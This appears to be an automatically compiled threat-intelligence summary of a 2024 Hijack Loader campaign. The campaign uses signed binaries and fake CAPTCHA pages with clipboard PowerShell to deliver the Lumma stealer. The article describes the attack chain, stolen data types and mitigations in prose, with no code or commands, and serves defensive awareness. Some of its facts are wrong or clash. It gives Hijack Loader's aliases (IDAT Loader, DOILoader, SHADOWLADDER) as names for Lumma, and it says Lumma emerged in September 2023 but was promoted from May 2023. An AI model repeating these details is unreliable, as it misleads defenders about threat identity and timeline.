Introduction
In early October 2024 [5] [6], cybersecurity researchers identified a sophisticated malware campaign involving Hijack Loader artifacts signed with legitimate code-signing certificates [2] [3] [5] [6] [7]. This campaign, detected by the French cybersecurity firm HarfangLab [2] [3] [5] [7], aims to deploy an information stealer known as Lumma [2] [3] [5] [6] [7]. Operating under the Malware-as-a-Service (MaaS) model [1], Lumma has been active since September 2023 and is promoted on Russian-speaking dark web forums and a Telegram channel. The malware targets Windows operating systems and is designed to harvest sensitive information.
Description
Cybersecurity researchers have uncovered a sophisticated malware campaign involving Hijack Loader artifacts [6], which are signed with legitimate code-signing certificates [2] [3] [5] [6] [7]. Detected by the French cybersecurity firm HarfangLab in early October 2024, this campaign aims to deploy an information stealer known as Lumma [3] [5] [6] [7], also referred to as DOILoader [3] [5] [6] [7], IDAT Loader [3] [5] [6] [7], and SHADOWLADDER [5] [6]. Lumma [1] [2] [3] [4] [5] [6] [7], which first emerged in September 2023, operates under the Malware-as-a-Service (MaaS) model and has been promoted on Russian-speaking dark web forums and a Telegram channel since May 2023 [1]. This subscription-based malware targets Windows operating systems from Windows 7 to Windows 11 and is approximately 150-200 KB in size.
Attack chains typically involve tricking users into downloading malicious binaries disguised as illegal software or movies [5] [6]. Recent tactics have included directing users to fake human verification pages, often utilizing Content Delivery Networks that present deceptive Google CAPTCHA prompts [4]. When users click the ‘I’m not a robot’ button [4], a PowerShell script is copied to their clipboard [4]. If executed, this script runs in a hidden window [4], retrieving further instructions from a remote server and ultimately downloading the Lumma Stealer malware [4]. The downloaded file [4], commonly named ‘dengo.zip,’ must be unzipped and executed on a Windows computer for the malware to activate [4], establishing connections to attacker-controlled domains [4].
HarfangLab has observed three distinct versions of the PowerShell script since mid-September 2024: one that uses mshta.exe to execute code hosted on an external server [5] [6], another that runs a remotely hosted PowerShell script via the Invoke-Expression cmdlet (iex) [5] [6], and a third that employs msiexec.exe to download and execute a payload from an external URL [5] [6]. The ZIP archive contains a legitimate executable file vulnerable to DLL side-loading [5] [6], alongside the malicious Hijack Loader DLL [5] [6]. The purpose of the sideloaded DLL is to decode and execute an encrypted file included in the package [5] [6], which conceals the final stage of Hijack Loader [5] [6], aimed at downloading and executing a stealer implant [5] [6].
Once a target is selected [1], Lumma performs system profiling to gather details about the operating system [1], hardware [1], and language to filter out unwanted targets [1]. It then collects sensitive information, focusing on browser data from Chromium and Mozilla-based browsers [1], including browsing history [1], cookies [1], extensions [1], usernames/passwords [1], personal identification details [1], and credit card information [1]. Additionally, Lumma seeks to identify cryptocurrency wallets and two-factor authentication (2FA) information before exfiltrating the data to its Command and Control (C2) server [1].
In early October 2024 [5] [6], the delivery mechanism shifted from DLL side-loading to utilizing various signed binary files to evade detection by security software [5] [6]. It remains unclear whether the code-signing certificates were stolen or intentionally generated by the threat actors [5] [6], although HarfangLab has assessed with low to moderate confidence that they may have been created intentionally [6]. The certificates have since been revoked [5] [6]. This research highlights that obtaining and activating a code-signing certificate is largely automated [6], requiring only a valid business registration number and a contact person [6]. This underscores that malware can be signed [6], indicating that code signatures alone cannot be relied upon as indicators of trustworthiness [5]. Furthermore, AttackIQ has developed an assessment template outlining the post-compromise Tactics [1], Techniques [1], and Procedures (TTPs) associated with Lumma Stealer’s recent activities [1], designed to help organizations validate their security controls against this financially motivated threat [1], which is adept at harvesting sensitive information quickly and automatically [1]. To mitigate risks [4], users should exercise caution with suspicious websites [4], refrain from running unknown commands [4], keep antivirus software updated [4], and ensure their systems are patched [4].
Conclusion
The Lumma malware campaign underscores the evolving sophistication of cyber threats, particularly those leveraging legitimate code-signing certificates to bypass security measures. The shift in delivery mechanisms highlights the adaptability of threat actors in evading detection. Organizations must remain vigilant, employing robust security controls and continuously updating their defenses to mitigate such threats. Users are advised to exercise caution online, maintain updated antivirus software, and ensure systems are patched to protect against this and similar threats. The research emphasizes the need for a comprehensive approach to cybersecurity, as code-signing certificates alone cannot guarantee trustworthiness.
References
[1] https://www.attackiq.com/2024/10/15/emulating-lumma-stealer/
[2] https://www.cybersecurityinformer.com/edition/daily-data-preservation-scams-2024-10-14/
[3] https://www.linkedin.com/posts/wdevaultnew-malware-campaign-uses-purecrypter-loader-activity-7251983259700453376-68KN
[4] https://ardwatalab.net/news-headlines/windows-users-are-being-tricked-by-sneaky-malware-scheme
[5] https://thehackernews.com/2024/10/researchers-uncover-hijack-loader.html
[6] https://www.techidee.nl/onderzoekers-ontdekken-hijack-loader-malware-met-behulp-van-gestolen-code-signing-certificaten/15293/
[7] https://www.linkedin.com/posts/wdevaultnew-linux-variant-of-fastcash-malware-targets-activity-7251983253388025857-NQxP
